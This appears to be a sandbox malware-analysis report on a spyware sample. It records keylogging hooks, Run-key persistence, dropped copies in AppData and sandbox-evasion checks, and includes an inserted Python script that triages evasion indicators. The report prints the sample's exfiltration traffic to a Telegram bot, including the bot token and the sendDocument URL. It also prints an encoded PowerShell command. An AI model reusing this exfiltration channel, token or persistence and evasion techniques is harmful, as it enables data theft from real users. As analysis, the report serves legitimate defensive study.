Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://urn.to/r/sds_see
Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/json
Source: kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown | HTTP traffic detected:
    POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5f
    Host: api.telegram.org
    Content-Length: 972
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49715 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\izwFjkhFJm.exe
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_06FC01F8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,00000000
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Window created: window name: CLIPBRDWNDCLASS
Source: izwFjkhFJm.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 0_2_054334F8
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 0_2_054360D0
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018EA9B8
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018EC978
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018E9DA0
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018EA0E8
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_06FC3B18
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_06FCA414
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073E6373
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073E9260
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073ED4B8
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073E4928
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 00000000.00000002.331982609.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 00000000.00000002.334575732.00000000038B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 00000000.00000000.248218694.0000000000598000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 00000000.00000003.318656978.0000000005301000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameWoxfcenh.dll" vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 00000000.00000002.334575732.0000000003826000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 0000000F.00000003.337045271.0000000006D3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe, 0000000F.00000002.517910261.00000000012F8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
Source: izwFjkhFJm.exe | ReversingLabs: Detection: 33%
Source: izwFjkhFJm.exe | Virustotal: Detection: 52%
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File read: C:\Users\user\Desktop\izwFjkhFJm.exe
Source: izwFjkhFJm.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Roaming\Ienlugq
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Local\Temp\CdFileMgr
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@29/16@8/2
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: Oefdyik.exe, 0000001B.00000002.534154582.000000000302D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: izwFjkhFJm.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: izwFjkhFJm.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: izwFjkhFJm.exe | Static file information: File size 1863168 > 1048576
Source: izwFjkhFJm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: izwFjkhFJm.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1c4800
Source: izwFjkhFJm.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb | source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 | source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 0_2_0266A338 push esp; iretd 0_2_0266A2BA
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe (dropped file)
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe (dropped file)

Boot Survival

Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    Process information set: NOOPENFILEERRORBOX    (30 identical entries)
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX    (91 identical entries)
               Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe    Process information set: NOOPENFILEERRORBOX    (40 identical entries)
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX    (53 identical entries)
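The signature lines on this page (Process information set, WMI Queries, Thread sleep time and Thread sleep count) are the raw material an analyst turns into a per-process evasion picture. The following Python script is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tool: it parses lines of exactly that shape, tolerates the run-together columns of the extracted text, and summarises per process which evasion indicators were observed. The WMI class list and the two thresholds are this example's own assumptions, chosen to mirror the report's ">= -30000s" and "> 30" tests; the embedded sample lines are copied from this page.

```python
"""Triage Joe Sandbox behaviour-signature lines for sandbox-evasion indicators.

Added example; it is not part of the Joe Sandbox report or of any Joe Sandbox
tool. It parses lines in the shape this page uses (Source / TID / observation /
value), tolerating the run-together columns of the extracted text, and groups
the evasion-relevant observations per process.
"""
import re
from collections import defaultdict
from typing import Optional

# One regex for the four observation types on this page. The column separators
# are optional because the extracted text runs them together
# ("...exeProcess information set", "TID: 2056Thread sleep time").
SIG_RE = re.compile(
    r"Source:\s*(?P<src>\S+?\.exe)\s*"
    r"(?:TID:\s*(?P<tid>\d+))?\s*"
    r"(?P<kind>Process information set|WMI Queries|Thread sleep time|Thread sleep count):\s*"
    r"(?P<val>.*?)\s*(?:Jump to behavior)?\s*$"
)

# WMI classes commonly enumerated to fingerprint a VM (assumed list; it covers
# the classes named in this report's signatures plus Win32_ComputerSystem).
VM_FINGERPRINT_CLASSES = {
    "Win32_BaseBoard", "Win32_Bios", "Win32_ComputerSystem",
    "Win32_NetworkAdapter", "Win32_NetworkAdapterConfiguration",
}

# Thresholds in the report's own units, mirroring its ">= -30000s" and "> 30"
# tests (assumed; the report does not state how it derives them).
LONG_SLEEP = 30000
MANY_SLEEPS = 30


def parse_line(line: str) -> Optional[dict]:
    """Return the fields of one signature line, or None for any other text."""
    m = SIG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    if rec["kind"] == "WMI Queries":
        # "IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard"
        rec["wmi_class"] = rec["val"].rsplit(":", 1)[-1].strip()
    elif rec["kind"] == "Thread sleep time":
        # "-1200000s >= -30000s": keep the magnitude of the observed delay
        rec["sleep"] = abs(int(re.match(r"-?\d+", rec["val"]).group()))
    elif rec["kind"] == "Thread sleep count":
        # "9668 > 30": number of sleep calls made by this thread
        rec["count"] = int(re.match(r"\d+", rec["val"]).group())
    return rec


def summarize(lines) -> dict:
    """Group parsed lines by source executable and derive evasion flags."""
    per_proc = defaultdict(lambda: {
        "wmi_classes": set(), "max_sleep": 0, "long_sleeps": 0,
        "max_sleep_count": 0, "error_mode_sets": 0, "flags": set(),
    })
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        p = per_proc[rec["src"]]
        if rec["kind"] == "WMI Queries":
            p["wmi_classes"].add(rec["wmi_class"])
            if rec["wmi_class"] in VM_FINGERPRINT_CLASSES:
                p["flags"].add("vm-fingerprint-wmi")
        elif rec["kind"] == "Thread sleep time":
            p["max_sleep"] = max(p["max_sleep"], rec["sleep"])
            if rec["sleep"] >= LONG_SLEEP:
                p["long_sleeps"] += 1
                p["flags"].add("long-sleep")
        elif rec["kind"] == "Thread sleep count":
            p["max_sleep_count"] = max(p["max_sleep_count"], rec["count"])
            if rec["count"] > MANY_SLEEPS:
                p["flags"].add("sleep-loop")
        elif "NOOPENFILEERRORBOX" in rec["val"]:
            # SetErrorMode(SEM_NOOPENFILEERRORBOX) keeps a failed file open from
            # raising a dialog that would stall an unattended run. Many benign
            # programs set it too, so on its own it is only a weak signal.
            p["error_mode_sets"] += 1
            p["flags"].add("silent-file-errors")
    return dict(per_proc)


def triage(lines) -> list:
    """Return (executable name, sorted flags) per process, most flags first."""
    summary = summarize(lines)
    rows = [(src.rsplit("\\", 1)[-1], sorted(p["flags"])) for src, p in summary.items()]
    return sorted(rows, key=lambda r: (-len(r[1]), r[0]))


# Constructed input: lines copied from this report page, in its extracted form.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 1304Thread sleep count: 9668 > 30Jump to behavior",
    r"Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1200000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -11990383647911201s >= -30000s",
    "Malware Analysis System Evasion",  # section heading, ignored by the parser
]

if __name__ == "__main__":
    for name, flags in triage(SAMPLE_LINES):
        print(f"{name:20s} {', '.join(flags) or '-'}")
```

Run against the full signature listing of a report, the per-process flag sets make it easy to see that the dropped persistence copies (Oefdyik.exe, kDPmkTm.exe) repeat the same WMI fingerprinting and sleep-loop behaviour as the original sample, while the spawned powershell.exe instances only show the long sleeps.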

              Malware Analysis System Evasion

               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 2056    Thread sleep time: -23058430092136925s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 1304    Thread sleep count: 9668 > 30
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    TID: 3232    Thread sleep time: -12912720851596678s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5364    Thread sleep count: 9210 > 30
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -7378697629483816s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1200000s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1199812s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1199514s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1199359s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1199233s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1199106s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1198966s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1198812s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1198685s >= -30000s
